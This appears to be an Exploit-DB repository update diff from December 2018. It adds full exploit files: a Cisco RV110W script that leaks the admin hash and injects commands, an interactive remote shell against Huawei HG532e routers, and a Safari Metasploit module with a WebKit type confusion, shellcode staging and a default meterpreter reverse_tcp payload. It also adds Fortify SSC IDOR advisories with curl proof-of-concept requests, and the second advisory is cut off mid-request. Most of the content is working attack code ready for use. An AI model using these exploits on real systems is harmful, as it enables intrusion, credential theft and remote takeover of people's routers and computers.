DB: 2018-12-15

16 changes to exploits/shellcodes

Angry IP Scanner 3.5.3 - Denial of Service (PoC)
UltraISO 9.7.1.3519 - 'Output FileName' Denial of Service (PoC)

Zortam MP3 Media Studio 24.15 - Local Buffer Overflow (SEH)
Cisco RV110W - Password Disclosure / Command Execution
Safari - Proxy Object Type Confusion (Metasploit)

Adminer 4.3.1 - Server-Side Request Forgery
Responsive FileManager 9.13.4 - Multiple Vulnerabilities
Fortify Software Security Center (SSC) 17.10/17.20/18.10 - Information Disclosure
Fortify Software Security Center (SSC) 17.10/17.20/18.10 - Information Disclosure (2)
Huawei Router HG532e - Command Execution
Facebook And Google Reviews System For Businesses - Cross-Site Request Forgery (Change Admin Password)
Facebook And Google Reviews System For Businesses 1.1 - SQL Injection
Facebook And Google Reviews System For Businesses 1.1 - Remote Code Execution
Double Your Bitcoin Script Automatic - Authentication Bypass

exploits/hardware/remote/45986.py

@@ -0,0 +1,98 @@
+#!/usr/bin/env python2
+
+#####
+## Cisco RV110W Password Disclosure and OS Command Execute.
+### Tested on version: 1.1.0.9 (maybe useable on 1.2.0.9 and later.)
+
+# Exploit Title: Cisco RV110W Password Disclosure and OS Command Execute
+# Date: 2018-08
+# Exploit Author: RySh
+# Vendor Homepage: https://www.cisco.com/
+# Version: 1.1.0.9
+# Tested on: RV110W 1.1.0.9
+# CVE : CVE-2014-0683, CVE-2015-6396
+
+import os
+import sys
+import re
+import urllib
+import urllib2
+import getopt
+import json
+
+import ssl
+
+ssl._create_default_https_context = ssl._create_unverified_context
+
+###
+# Usage: ./{script_name} 192.168.1.1 443 "reboot"
+###
+
+if __name__ == "__main__":
+    IP = argv[1]
+    PORT = argv[2]
+    CMD = argv[3]
+    
+    # Get session key, Just access index page.
+    url = 'https://' + IP + ':' + PORT + '/'
+    req = urllib2.Request(url)
+    result = urllib2.urlopen(req)
+    res = result.read()
+    
+    # parse 'admin_pwd'! -- Get credits
+    admin_user = re.search(r'.*(.*admin_name=\")(.*)\"', res).group().split("\"")[1]
+    admin_pwd = re.search(r'.*(.*admin_pwd=\")(.{32})', res).group()[-32:]
+    print "Get Cred. Username = " + admin_user + ", PassHash = " + admin_pwd
+
+    # Get session_id by POST
+    req2 = urllib2.Request(url + "login.cgi")
+    req2.add_header('Origin', url)
+    req2.add_header('Upgrade-Insecure-Requests', 1)
+    req2.add_header('Content-Type', 'application/x-www-form-urlencoded')
+    req2.add_header('User-Agent',
+                    'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko)')
+    req2.add_header('Accept', 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8')
+    req2.add_header('Referer', url)
+    req2.add_header('Accept-Encoding', 'gzip, deflate')
+    req2.add_header('Accept-Language', 'en-US,en;q=0.9')
+    req2.add_header('Cookie', 'SessionID=')
+    data = {"submit_button": "login",
+            "submit_type": "",
+            "gui_action": "",
+            "wait_time": "0",
+            "change_action": "",
+            "enc": "1",
+            "user": admin_user,
+            "pwd": admin_pwd,
+            "sel_lang": "EN"
+            }
+    r = urllib2.urlopen(req2, urllib.urlencode(data))
+    resp = r.read()
+    login_st = re.search(r'.*login_st=\d;', resp).group().split("=")[1]
+    session_id = re.search(r'.*session_id.*\";', resp).group().split("\"")[1]
+
+    # Execute your commands via diagnose command parameter, default command is `reboot`
+    req3 = urllib2.Request(url + "apply.cgi;session_id=" + session_id)
+    req3.add_header('Origin', url)
+    req3.add_header('Upgrade-Insecure-Requests', 1)
+    req3.add_header('Content-Type', 'application/x-www-form-urlencoded')
+    req3.add_header('User-Agent',
+                    'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko)')
+    req3.add_header('Accept', 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8')
+    req3.add_header('Referer', url)
+    req3.add_header('Accept-Encoding', 'gzip, deflate')
+    req3.add_header('Accept-Language', 'en-US,en;q=0.9')
+    req3.add_header('Cookie', 'SessionID=')
+    data_cmd = {"submit_button": "Diagnostics",
+            "change_action": "gozila_cgi",
+            "submit_type": "start_ping",
+            "gui_action": "",
+            "traceroute_ip": "",
+            "commit": "1",
+            "ping_times": "3 |" + CMD + "|",
+            "ping_size": "64",
+            "wait_time": "4",
+            "ping_ip": "127.0.0.1",
+            "lookup_name": ""
+            }
+    r = urllib2.urlopen(req3, urllib.urlencode(data_cmd))

exploits/hardware/webapps/45991.py

@@ -0,0 +1,51 @@
+#!/bin/python
+'''
+    Author : Rebellion
+    Github : @rebe11ion
+    Twitter : @rebellion
+'''
+
+import urllib2,requests,os,sys
+from requests.auth import HTTPDigestAuth
+DEFAULT_HEADERS = {"User-Agent": "Mozilla", }
+DEFAULT_TIMEOUT = 5
+def fetch_url(url):
+    global DEFAULT_HEADERS, DEFAULT_TIMEOUT
+    request = urllib2.Request(url, headers=DEFAULT_HEADERS)
+    data = urllib2.urlopen(request, timeout=DEFAULT_TIMEOUT).read()
+    return data
+
+def exploit(ip, path):
+    url = "http://%s:37215/icon/../../../%s" % (ip, path)
+    data = fetch_url(url)
+    return data
+
+def main():
+    pwd = "/"
+    cmd_path = "/tmp/ccmd"
+    pwd_path = "/tmp/cpwd"
+    while True:
+       targetip = sys.argv[1]
+       cmd_ = raw_input("[{}]$ ".format(pwd))
+       cmd = "cd {} ; {} > {} ; pwd > {}".format(pwd,cmd_.split("|")[0],cmd_path,pwd_path)
+       rm = "<?xml version=\"1.0\" ?>\n    <s:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">\n    <s:Body><u:Upgrade xmlns:u=\"urn:schemas-upnp-org:service:WANPPPConnection:1\">\n    <NewStatusURL>$(" + cmd + ")</NewStatusURL>\n<NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL>\n</u:Upgrade>\n    </s:Body>\n    </s:Envelope>"
+       url = "http://192.168.1.1:37215/ctrlt/DeviceUpgrade_1"
+       requests.post(url, auth=HTTPDigestAuth('dslf-config', 'admin'), data=rm)
+       assert cmd_path.startswith("/"), "An absolute path is required"
+       data = exploit(targetip, cmd_path)
+       open(cmd_path,"wb").write(data)
+       if "cd" in cmd_:
+          pass
+       elif "clear" in cmd_:
+          os.system("clear")
+       elif "cat" in cmd_:
+          os.system(cmd_.replace(cmd_.split("cat")[1].split(" ")[1],cmd_path))
+       else:
+          if "|" in cmd_:
+             os.system("cat {} | {}".format(cmd_path,cmd_.split("|")[1]))
+          else:
+             os.system("cat {}".format(cmd_path))
+       pwd = exploit(targetip,pwd_path).strip("\n")
+
+if __name__ == "__main__":
+    main()

exploits/macos/remote/45998.rb

@@ -0,0 +1,510 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ManualRanking
+
+  include Msf::Exploit::EXE
+  include Msf::Exploit::Remote::HttpServer
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Safari Proxy Object Type Confusion',
+      'Description'    => %q{
+          This module exploits a type confusion bug in the Javascript Proxy object in
+        WebKit. The DFG JIT does not take into account that, through the use of a Proxy,
+        it is possible to run arbitrary JS code during the execution of a CreateThis
+        operation. This makes it possible to change the structure of e.g. an argument
+        without causing a bailout, leading to a type confusion (CVE-2018-4233).
+
+          The JIT region is then replaced with shellcode which loads the second stage.
+        The second stage exploits a logic error in libxpc, which uses command execution
+        via the launchd's "spawn_via_launchd" API (CVE-2018-4404).
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         => [ 'saelo' ],
+      'References'     => [
+          ['CVE', '2018-4233'],
+          ['CVE', '2018-4404'],
+          ['URL', 'https://github.com/saelo/cve-2018-4233'],
+          ['URL', 'https://github.com/saelo/pwn2own2018'],
+          ['URL', 'https://saelo.github.io/presentations/blackhat_us_18_attacking_client_side_jit_compilers.pdf'],
+        ],
+      'Arch'           => [ ARCH_PYTHON, ARCH_CMD ],
+      'Platform'       => 'osx',
+      'DefaultTarget'  => 0,
+      'DefaultOptions' => { 'PAYLOAD' => 'python/meterpreter/reverse_tcp' },
+      'Targets'        => [
+          [ 'Python payload',  { 'Arch' => ARCH_PYTHON, 'Platform' => [ 'python' ] } ],
+          [ 'Command payload', { 'Arch' => ARCH_CMD, 'Platform' => [ 'unix' ] } ],
+        ],
+      'DisclosureDate' => 'Mar 15 2018'))
+    register_advanced_options([
+      OptBool.new('DEBUG_EXPLOIT', [false, "Show debug information in the exploit javascript", false]),
+    ])
+  end
+
+  def offset_table
+    {
+      '10.12.6' => {
+        :jsc_vtab => '0x0000d8d8',
+        :dyld_stub_loader => '0x00001168',
+        :dlopen => '0x000027f7',
+        :confstr => '0x00002c84',
+        :strlen => '0x00001b40',
+        :strlen_got => '0xdc0',
+      },
+      '10.13' => {
+        :jsc_vtab => '0x0000e5f8',
+        :dyld_stub_loader => '0x000012a8',
+        :dlopen => '0x00002e60',
+        :confstr => '0x000024fc',
+        :strlen => '0x00001440',
+        :strlen_got => '0xee8',
+      },
+      '10.13.3' => {
+        :jsc_vtab => '0xe5e8',
+        :dyld_stub_loader => '0x1278',
+        :dlopen => '0x2e30',
+        :confstr => '0x24dc',
+        :strlen => '0x1420',
+        :strlen_got => '0xee0',
+      },
+    }
+  end
+
+  def exploit_data(directory, file)
+    path = ::File.join Msf::Config.data_directory, 'exploits', directory, file
+    ::File.binread path
+  end
+
+  def stage1_js
+    stage1 = exploit_data "CVE-2018-4233", "stage1.bin"
+    "var stage1 = new Uint8Array([#{Rex::Text::to_num(stage1)}]);"
+  end
+
+  def stage2_js
+    stage2 = exploit_data "CVE-2018-4404", "stage2.dylib"
+    payload_cmd = payload.raw
+    if target['Arch'] == ARCH_PYTHON
+      payload_cmd = "echo \"#{payload_cmd}\" | python"
+    end
+    placeholder_index = stage2.index('PAYLOAD_CMD_PLACEHOLDER')
+    stage2[placeholder_index, payload_cmd.length] = payload_cmd
+    "var stage2 = new Uint8Array([#{Rex::Text::to_num(stage2)}]);"
+  end
+
+  def get_offsets(user_agent)
+    if user_agent =~ /Intel Mac OS X (.*?)\)/
+      version = $1.gsub("_", ".")
+      mac_osx_version = Gem::Version.new(version)
+      if mac_osx_version >= Gem::Version.new('10.13.4')
+        print_warning "macOS version #{mac_osx_version} is not vulnerable"
+      elsif mac_osx_version < Gem::Version.new('10.12')
+        print_warning "macOS version #{mac_osx_version} is not vulnerable"
+      elsif offset_table.key?(version)
+        offset = offset_table[version]
+        return <<-EOF
+const JSC_VTAB_OFFSET = #{offset[:jsc_vtab]};
+const DYLD_STUB_LOADER_OFFSET = #{offset[:dyld_stub_loader]};
+const DLOPEN_OFFSET = #{offset[:dlopen]};
+const CONFSTR_OFFSET = #{offset[:confstr]};
+const STRLEN_OFFSET = #{offset[:strlen]};
+const STRLEN_GOT_OFFSET = #{offset[:strlen_got]};
+EOF
+      else
+        print_warning "No offsets for version #{mac_osx_version}"
+      end
+    else
+      print_warning "Unexpected User-Agent"
+    end
+    return false
+  end
+
+  def on_request_uri(cli, request)
+    user_agent = request['User-Agent']
+    print_status("Request from #{user_agent}")
+    offsets = get_offsets(user_agent)
+    unless offsets
+      send_not_found(cli)
+      return
+    end
+
+    utils = exploit_data "CVE-2018-4233", "utils.js"
+    int64 = exploit_data "CVE-2018-4233", "int64.js"
+    html = %Q^
+<html>
+<body>
+<script>
+#{stage1_js}
+stage1.replace = function(oldVal, newVal) {
+    for (var idx = 0; idx < this.length; idx++) {
+        var found = true;
+        for (var j = idx; j < idx + 8; j++) {
+            if (this[j] != oldVal.byteAt(j - idx)) {
+                found = false;
+                break;
+            }
+        }
+        if (found)
+            break;
+    }
+    this.set(newVal.bytes(), idx);
+};
+#{stage2_js}
+#{utils}
+#{int64}
+#{offsets}
+
+var ready = new Promise(function(resolve) {
+    if (typeof(window) === 'undefined')
+        resolve();
+    else
+        window.onload = function() {
+            resolve();
+        }
+});
+
+ready = Promise.all([ready]);
+
+print = function(msg) {
+    //console.log(msg);
+    //document.body.innerText += msg + '\\n';
+}
+
+// Must create this indexing type transition first,
+// otherwise the JIT will deoptimize later.
+var a = [13.37, 13.37];
+a[0] = {};
+
+var referenceFloat64Array = new Float64Array(0x1000);
+
+//
+// Bug: the DFG JIT does not take into account that, through the use of a
+// Proxy, it is possible to run arbitrary JS code during the execution of a
+// CreateThis operation. This makes it possible to change the structure of e.g.
+// an argument without causing a bailout, leading to a type confusion.
+//
+
+//
+// addrof primitive
+//
+function setupAddrof() {
+    function InfoLeaker(a) {
+        this.address = a[0];
+    }
+
+    var trigger = false;
+    var leakme = null;
+    var arg = null;
+
+    var handler = {
+        get(target, propname) {
+            if (trigger)
+                arg[0] = leakme;
+            return target[propname];
+        },
+    };
+    var InfoLeakerProxy = new Proxy(InfoLeaker, handler);
+
+    for (var i = 0; i < 100000; i++) {
+        new InfoLeakerProxy([1.1, 2.2, 3.3]);
+    }
+
+    trigger = true;
+
+    return function(obj) {
+        leakme = obj;
+        arg = [1.1, 1.1];
+        var o = new InfoLeakerProxy(arg);
+        return o.address;
+    };
+}
+
+//
+// fakeobj primitive
+//
+function setupFakeobj() {
+    function ObjFaker(a, address) {
+        a[0] = address;
+    }
+
+    var trigger = false;
+    var arg = null;
+
+    var handler = {
+        get(target, propname) {
+            if (trigger)
+                arg[0] = {};
+            return target[propname];
+        },
+    };
+    var ObjFakerProxy = new Proxy(ObjFaker, handler);
+
+    for (var i = 0; i < 100000; i++) {
+        new ObjFakerProxy([1.1, 2.2, 3.3], 13.37);
+    }
+
+    trigger = true;
+
+    return function(address) {
+        arg = [1.1, 1.1];
+        var o = new ObjFakerProxy(arg, address);
+        return arg[0];
+    };
+}
+
+function makeJITCompiledFunction() {
+    // Some code to avoid inlining...
+    function target(num) {
+        for (var i = 2; i < num; i++) {
+            if (num % i === 0) {
+                return false;
+            }
+        }
+        return true;
+    }
+
+    // Force JIT compilation.
+    for (var i = 0; i < 1000; i++) {
+        target(i);
+    }
+    for (var i = 0; i < 1000; i++) {
+        target(i);
+    }
+    for (var i = 0; i < 1000; i++) {
+        target(i);
+    }
+    return target;
+}
+
+function pwn() {
+    // Spray Float64Array structures so that structure ID 0x1000 will
+    // be a Float64Array with very high probability
+    var structs = [];
+    for (var i = 0; i < 0x1000; i++) {
+        var a = new Float64Array(1);
+        a['prop' + i] = 1337;
+        structs.push(a);
+    }
+
+    // Setup exploit primitives
+    var addrofOnce = setupAddrof();
+    var fakeobjOnce = setupFakeobj();
+
+    // (Optional) Spray stuff to keep the background GC busy and increase reliability even further
+    /*
+    var stuff = [];
+    for (var i = 0; i < 0x100000; i++) {
+        stuff.push({foo: i});
+    }
+    */
+
+    var float64MemView = new Float64Array(0x200);
+    var uint8MemView = new Uint8Array(0x1000);
+
+    // Setup container to host the fake Float64Array
+    var jsCellHeader = new Int64([
+        00, 0x10, 00, 00,     // m_structureID
+        0x0,                  // m_indexingType
+        0x2b,                 // m_type
+        0x08,                 // m_flags
+        0x1                   // m_cellState
+    ]);
+
+    var container = {
+        jsCellHeader: jsCellHeader.asJSValue(),
+        butterfly: null,
+        vector: float64MemView,
+        length: (new Int64('0x0001000000001337')).asJSValue(),
+        mode: {},       // an empty object, we'll need that later
+    };
+
+    // Leak address and inject fake object
+    // RawAddr == address in float64 form
+    var containerRawAddr = addrofOnce(container);
+    var fakeArrayAddr = Add(Int64.fromDouble(containerRawAddr), 16);
+    print("[+] Fake Float64Array @ " + fakeArrayAddr);
+
+    ///
+    /// BEGIN CRITICAL SECTION
+    ///
+    /// Objects are corrupted, a GC would now crash the process.
+    /// We'll try to repair everything as quickly as possible and with a minimal amount of memory allocations.
+    ///
+    var driver = fakeobjOnce(fakeArrayAddr.asDouble());
+    while (!(driver instanceof Float64Array)) {
+        jsCellHeader.assignAdd(jsCellHeader, Int64.One);
+        container.jsCellHeader = jsCellHeader.asJSValue();
+    }
+
+    // Get some addresses that we'll need to repair our objects. We'll abuse the .mode
+    // property of the container to leak addresses.
+    driver[2] = containerRawAddr;
+    var emptyObjectRawAddr = float64MemView[6];
+    container.mode = referenceFloat64Array;
+    var referenceFloat64ArrayRawAddr = float64MemView[6];
+
+    // Fixup the JSCell header of the container to make it look like an empty object.
+    // By default, JSObjects have an inline capacity of 6, enough to hold the fake Float64Array.
+    driver[2] = emptyObjectRawAddr;
+    var header = float64MemView[0];
+    driver[2] = containerRawAddr;
+    float64MemView[0] = header;
+
+    // Copy the JSCell header from an existing Float64Array and set the butterfly to zero.
+    // Also set the mode: make it look like an OversizeTypedArray for easy GC survival
+    // (see JSGenericTypedArrayView<Adaptor>::visitChildren).
+    driver[2] = referenceFloat64ArrayRawAddr;
+    var header = float64MemView[0];
+    var length = float64MemView[3];
+    var mode = float64MemView[4];
+    driver[2] = containerRawAddr;
+    float64MemView[2] = header;
+    float64MemView[3] = 0;
+    float64MemView[5] = length;
+    float64MemView[6] = mode;
+
+    // Root the container object so it isn't garbage collected.
+    // This will allocate a butterfly for the fake object and store a reference to the container there.
+    // The fake array itself is rooted by the memory object (closures).
+    driver.container = container;
+
+    ///
+    /// END CRITICAL SECTION
+    ///
+    /// Objects are repaired, we will now survive a GC
+    ///
+    if (typeof(gc) !== 'undefined')
+        gc();
+
+    memory = {
+        read: function(addr, length) {
+            driver[2] = memory.addrof(uint8MemView).asDouble();
+            float64MemView[2] = addr.asDouble();
+            var a = new Array(length);
+            for (var i = 0; i < length; i++)
+                a[i] = uint8MemView[i];
+            return a;
+        },
+
+        write: function(addr, data) {
+            driver[2] = memory.addrof(uint8MemView).asDouble();
+            float64MemView[2] = addr.asDouble();
+            for (var i = 0; i < data.length; i++)
+                uint8MemView[i] = data[i];
+        },
+
+        read8: function(addr) {
+            driver[2] = addr.asDouble();
+            return Int64.fromDouble(float64MemView[0]);
+        },
+
+        write8: function(addr, value) {
+            driver[2] = addr.asDouble();
+            float64MemView[0] = value.asDouble();
+        },
+
+        addrof: function(obj) {
+            float64MemView.leakme = obj;
+            var butterfly = Int64.fromDouble(driver[1]);
+            return memory.read8(Sub(butterfly, 0x10));
+        },
+    };
+
+    print("[+] Got stable memory read/write!");
+
+    // Find binary base
+    var funcAddr = memory.addrof(Math.sin);
+    var executableAddr = memory.read8(Add(funcAddr, 24));
+    var codeAddr = memory.read8(Add(executableAddr, 24));
+    var vtabAddr = memory.read8(codeAddr);
+    var jscBaseUnaligned = Sub(vtabAddr, JSC_VTAB_OFFSET);
+    print("[*] JavaScriptCore.dylib @ " + jscBaseUnaligned);
+    var jscBase = And(jscBaseUnaligned, new Int64("0x7ffffffff000"));
+    print("[*] JavaScriptCore.dylib @ " + jscBase);
+
+    var dyldStubLoaderAddr = memory.read8(jscBase);
+    var dyldBase = Sub(dyldStubLoaderAddr, DYLD_STUB_LOADER_OFFSET);
+    var strlenAddr = memory.read8(Add(jscBase, STRLEN_GOT_OFFSET));
+    var libCBase = Sub(strlenAddr, STRLEN_OFFSET);
+    print("[*] dyld.dylib @ " + dyldBase);
+    print("[*] libsystem_c.dylib @ " + libCBase);
+
+    var confstrAddr = Add(libCBase, CONFSTR_OFFSET);
+    print("[*] confstr @ " + confstrAddr);
+    var dlopenAddr = Add(dyldBase, DLOPEN_OFFSET);
+    print("[*] dlopen @ " + dlopenAddr);
+
+    // Patching shellcode
+    var stage2Addr = memory.addrof(stage2);
+    stage2Addr = memory.read8(Add(stage2Addr, 16));
+    print("[*] Stage 2 payload @ " + stage2Addr);
+
+    stage1.replace(new Int64("0x4141414141414141"), confstrAddr);
+    stage1.replace(new Int64("0x4242424242424242"), stage2Addr);
+    stage1.replace(new Int64("0x4343434343434343"), new Int64(stage2.length));
+    stage1.replace(new Int64("0x4444444444444444"), dlopenAddr);
+    print("[+] Shellcode patched");
+
+    // Leak JITCode pointer poison value
+    var poison_addr = Add(jscBase, 305152);
+    print("[*] Poison value @ " + poison_addr);
+    var poison = memory.read8(poison_addr);
+    print("[*] Poison value: " + poison);
+
+    // Shellcode
+    var func = makeJITCompiledFunction();
+    var funcAddr = memory.addrof(func);
+    print("[+] Shellcode function object @ " + funcAddr);
+    var executableAddr = memory.read8(Add(funcAddr, 24));
+    print("[+] Executable instance @ " + executableAddr);
+    var jitCodeAddr = memory.read8(Add(executableAddr, 24));
+    print("[+] JITCode instance @ " + jitCodeAddr);
+
+    var codeAddrPoisoned = memory.read8(Add(jitCodeAddr, 32));
+    var codeAddr = Xor(codeAddrPoisoned, poison);
+    print("[+] RWX memory @ " + codeAddr.toString());
+    print("[+] Writing shellcode...");
+    var origCode = memory.read(codeAddr, stage1.length);
+    memory.write(codeAddr, stage1);
+
+    print("[!] Jumping into shellcode...");
+    var res = func();
+    if (res === 0) {
+        print("[+] Shellcode executed sucessfully!");
+    } else {
+        print("[-] Shellcode failed to execute: error " + res);
+    }
+
+    memory.write(codeAddr, origCode);
+    print("[*] Restored previous JIT code");
+
+    print("[+] We are done here, continuing WebContent process as if nothing happened =)");
+    if (typeof(gc) !== 'undefined')
+        gc();
+}
+
+ready.then(function() {
+    try {
+        pwn();
+    } catch (e) {
+        print("[-] Exception caught: " + e);
+    }
+}).catch(function(err) {
+    print("[-] Initializatin failed");
+});
+
+</script>
+</body>
+</html>
+    ^
+    unless datastore['DEBUG_EXPLOIT']
+      html.gsub!(/^\s*print\s*\(.*?\);\s*$/, '')
+    end
+    send_response(cli, html, {'Content-Type'=>'text/html'})
+  end
+
+end

exploits/multiple/webapps/45989.txt

@@ -0,0 +1,185 @@
+Details
+================
+Software: Fortify SSC (Software Security Center)
+Version: 17.10, 17.20 & 18.10
+Homepage: https://www.microfocus.com
+Advisory report: https://github.com/alt3kx/CVE-2018-7690
+CVE: CVE-2018-7690
+CVSS: 6.5 (Medium; AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N)
+CWE-639
+
+Description
+================
+Fortify SSC (Software Security Center) REST-API contain Insecure direct object references (IDOR) allowing reading arbitrary details of other user's
+Fortify projects via GET method
+
+Vulnerability
+================
+Fortify SSC (Software Security Center) 7.10, does not properly check ownership of projects, which allows remote authenticated (view-only) users
+to read arbitrary details via API projects ID parameter to /api/v1/projects/{NUMBER}
+
+Note: View-only Role, is a restricted role, can view results, but cannot interfere with the issue triage or the remediation process.
+
+Proof of concept
+================
+
+Pre-requisites:
+
+- curl command deployed (Windows or Linux)
+- jq command deployed (for parsing JSON fields), (Windows or Linux)
+- Burpsuite Free/Pro deployed or any other Proxy to catch/send the request (optional)
+
+Step (1): LogOn into fortifyserver.com SSC (Software Security Center) 17.10 with your view-only role (restricted),
+
+The URL normally is avaiable as following:
+
+Target: https://fortifyserver.com/ssc/#/
+
+Step (2): Once logged extract the Cookie field, the formmat normallly as following: "Cookie: JSESSIONID=A98ACC5DA0FB519210D9C198D2F4E3FF;"
+Step (3): Start BurpSuite Free/Pro or any other HTTP proxy (optional) listen port 8080 as default
+
+Step (4): The offending GET is:
+
+GET /ssc/api/v1/projects/2 HTTP/1.1
+Host: fortifyserver.com
+Connection: close
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Cookie: JSESSIONID=A98ACC5DA0FB519210D9C198D2F4E3FF;
+
+Step (5): Test the first GET (to be included the cookie session) request and parsing the JSON data received using curl and jq commands as following:
+
+# curl -s -k -X GET https://fortifyserver.com/ssc/api/v1/projects/2
+
+-H "Host: fortifyserver.com"
+-H "Connection: close"
+-H "User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36"
+-H "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8"
+-H "Accept-Encoding: gzip, deflate"
+-H "Accept-Language: en-US,en;q=0.9"
+-H "Cookie: JSESSIONID=A98ACC5DA0FB519210D9C198D2F4E3FF;"
+-b "JSESSIONID=A98ACC5DA0FB519210D9C198D2F4E3FF"
+--proxy http://127.0.0.1:8080 | jq '.data'
+
+You should see the following response project details:
+
+{
+  "createdBy": "admin",
+  "name": "Project Name Here",
+  "description": "",
+  "id": 2,
+  "creationDate": "2012-08-03T09:43:36.000+0000",
+  "issueTemplateId": null
+}
+
+Step (6): Now extract all the projects details registered into Fortify SSC server:
+
+Payload:  https://fortifyserver.com/ssc/api/v1/projects/{NUMBER} , and change the number as following:
+
+# curl -s -k -X GET https://fortifyserver.com/ssc/api/v1/projects/5
+
+-H "Host: fortifyserver.com"
+-H "Connection: close"
+-H "User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36"
+-H "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8"
+-H "Accept-Encoding: gzip, deflate"
+-H "Accept-Language: en-US,en;q=0.9"
+-H "Cookie: JSESSIONID=A98ACC5DA0FB519210D9C198D2F4E3FF;"
+-b "JSESSIONID=A98ACC5DA0FB519210D9C198D2F4E3FF"
+--proxy http://127.0.0.1:8080 | jq '.data'
+
+You should see other project details available as following:
+
+{
+"createdBy": "alex",
+"name": "Project Name Here",
+"description": "",
+"id": 5,
+"creationDate": "2012-09-21T09:35:16.000+0000",
+"issueTemplateId": null
+}
+
+Step (7): Automate with BurpSuite Pro/Free choose:
+
+Payload Positions: "Intruder Tab -> Positions" highlight as following:
+
+-> /ssc/api/v1/projects/§1§
+
+Payloads set: "Intruder Tab -> Payloads" with the following data:
+
+-> Payload set: 1
+
+-> Payload type: Numbers
+
+Payload Options [Numbers]:
+
+-> Type: Sequential
+
+-> From: 0
+
+-> To: 1500
+
+-> Step: 1
+
+Then start attack...
+
+Have fun!
+
+Mitigations
+================
+Install the latest patches availabe here:
+https://softwaresupport.softwaregrp.com/doc/KM03298201
+
+Disclosure policy
+================
+We believes in responsible disclosure.
+Please contact us on Alex Hernandez aka alt3kx  (at) protonmail com to acknowledge this report.
+
+This vulnerability will be published if we do not receive a response to this report with 10 days.
+
+Timeline
+================
+
+2018-05-24: Discovered
+2018-05-25: Retest PRO environment
+2018-05-31: Vendor notification, two issues found
+2018-05-31: Vendor feedback received
+2018-06-01: Internal communication
+2018-06-01: Vendor feedback, two issues are confirmed
+2018-06-05: Vendor notification, new issue found
+2018-06-06: Vendor feedback, evaluating High submission
+2018-06-08: Vendor feedback, High issue is confirmed
+2018-06-19: Researcher, reminder sent
+2018-06-22: Vendor feedback, summary of CVEs handled as official way
+2018-06-26: Vendor feedback, official Hotfix for High issue available to test
+2018-06-29: Researcher feedback
+2018-07-02: Researcher feedback
+2018-07-04: Researcher feedback, Hotfix tested on QA environment
+2018-07-05: Vendor feedback, fixes scheduled Aug/Sep 2018
+2018-08-02: Reminder to vendor, feedback received OK!
+2018-09-26: Reminder to vendor, feedback received OK!
+2018-09-26: Fixes received from the vendor
+2018-10-02: Internal QA environment failed, re-building researcher 's ecosystem
+2018-10-11: Internal QA environment failed, re-building researcher 's ecosystem
+2018-10-11: Feedback from the vendor, technical details provided to the researcher
+2018-10-16: Fixes now tested on QA environment
+2018-11-08: Reminder received from the vendor, feedback provided by researcher
+2018-11-09: Re-rest fixes on QA environment
+2018-11-15: Re-rest fixes on QA environment now with SSC 18.20 version deployed
+2018-11-21: Researcher feedback
+2018-11-23: Fixes working well/confirmed by researcher
+2018-11-23: Vendor feedback, final details to disclosure the CVE and official fixes available for customers.
+2018-11-26: Vendor feedback, CVE, and official fixes to be disclosure
+2018-11-26: Agreements with the vendor to publish the CVE/Advisory.
+2018-12-12: Public report
+
+Discovered by:
+Alex Hernandez aka alt3kx:
+================
+Please visit https://github.com/alt3kx for more information.
+
+My current exploit list @exploit-db:
+https://www.exploit-db.com/author/?a=1074 & https://www.exploit-db.com/author/?a=9576

exploits/multiple/webapps/45990.txt

@@ -0,0 +1,185 @@
+Details
+================
+Software: Fortify SSC (Software Security Center)
+Version: 17.10, 17.20 & 18.10
+Homepage: https://www.microfocus.com
+Advisory report: https://github.com/alt3kx/CVE-2018-7691
+CVE: CVE-2018-7691
+CVSS: 6.5 (Medium; AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N)
+CWE-639
+
+Description
+================
+REST API contains Insecure direct object references (IDOR) allowing and extracting arbitrary details of the Local and LDAP users via POST method
+
+Vulnerability
+================
+Fortify SSC (Software Security Center) 17.10, does not properly check ownership of "authEntities", which allows remote authenticated (view-only) users
+to read arbitrary details via API bulk parameter to /api/v1/projectVersions/{NUMBER}/authEntities
+
+Note: View-only Role, is a restricted role, can view results, but cannot interfere with the issue triage or the remediation process.
+
+Proof of concept
+================
+
+Pre-requisites:
+
+- Curl command deployed (Windows or Linux)
+- jq command deployed (for parsing JSON fields), (Windows or Linux)
+- Burpsuite Free/Por deployed or any other Proxy to catch/send the request (optional)
+
+Step (1): LogOn into fortifyserver.com SSC (Software Security Center) 17.10 with your view-only role (restricted),
+
+The URL normally is avaiable as following:
+
+Target: https://fortifyserver.com/ssc/#/
+
+Step (2): Once logged extract the Cookie field, the format normally as following: "Cookie: JSESSIONID=69B1DBD72FCA8DB57C08B01655A07414;"
+Step (3): Start BurpSuite Free/Pro or any other HTTP proxy (optional) listen port 8080 as default
+
+Step (4): The offending POST is:
+
+POST /ssc/api/v1/bulk HTTP/1.1
+Host: fortifyserver.com
+Connection: close
+Accept: application/json, text/plain, */*
+X-Requested-With: XMLHttpRequest
